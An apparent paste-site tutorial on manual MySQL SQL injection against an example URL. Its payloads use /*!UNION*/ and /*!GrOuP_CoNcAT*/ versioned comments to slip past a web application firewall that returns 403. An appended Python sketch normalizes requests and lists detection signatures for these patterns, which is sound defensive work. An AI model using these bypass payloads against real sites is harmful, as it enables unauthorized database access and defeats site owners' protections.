Kyfx

mysqli error injection manually for nubs

Jun 24th, 2015
Here we have a vulnerable URL:
http://example.com/sqli.php?id=1' ( MySQL error )
Now let's try the UNION SELECT statement and see what happens:
http://example.com/sqli.php?id=1+union+select+1 ( 403 FORBIDDEN )
If you see the 403 FORBIDDEN page, that means a WAF is enabled. So how can we bypass it?
Simply, we add MySQL comment characters to our command. MySQL still executes the contents of a /*! ... */ comment, while a WAF rule that matches the plain keywords no longer fires.
So it will be:
UNION+SELECT > /*!UNION*/+/*!SELECT*/
group_concat(table_name) > /*!GrOuP_CoNcAT(table_name)*/
group_concat(column_name) > /*!GrOuP_CoNcAT(column_name)*/
So, after replacing the normal commands with those commands, you will see that the 403 error has been bypassed successfully.
Example:
http://example.com/sqli.php?id=1+/*!UNION*/+/*!SELECT*/+1 > No errors, the SQL injection executed successfully
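
Seen from the WAF side, the bypass above works only because the rule inspects the raw request. The following is an added example, not part of the original paste: a Python sketch of a rule that first normalizes the query string the way MySQL reads it. The names `naive_match`, `normalize` and `detect` are hypothetical, and the sample query strings in the test are constructed from the URLs in the paste.

```python
import re
from urllib.parse import unquote_plus

# Rule of the kind the paste defeats: plain keywords separated by whitespace.
NAIVE = re.compile(r"union\s+select", re.IGNORECASE)

# MySQL executes the body of /*! ... */ (optionally /*!50000 ... */),
# so the body has to be kept and only the comment markers dropped.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.DOTALL)
# Ordinary /* ... */ comments are ignored by MySQL and act as separators.
PLAIN = re.compile(r"/\*.*?\*/", re.DOTALL)

# Signatures are applied to the normalized (lower-cased) text only.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+|distinct\s+)?select\b"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
}


def naive_match(raw_query: str) -> bool:
    """Keyword rule applied to the URL-decoded query string, no normalization."""
    return bool(NAIVE.search(unquote_plus(raw_query)))


def normalize(raw_query: str) -> str:
    """Reduce a query string to the token stream MySQL would see."""
    text = unquote_plus(raw_query)        # '+' and %xx become real characters
    text = VERSIONED.sub(r" \1 ", text)   # unwrap executable comments first
    text = PLAIN.sub(" ", text)           # then drop ordinary comments
    return re.sub(r"\s+", " ", text).lower().strip()


def detect(raw_query: str) -> list:
    """Return the names of the signatures that match after normalization."""
    norm = normalize(raw_query)
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]
```

Matching on normalized input is defense in depth only; the injection itself goes away when sqli.php passes `id` to the database as a bound parameter in a prepared statement instead of concatenating it into the query.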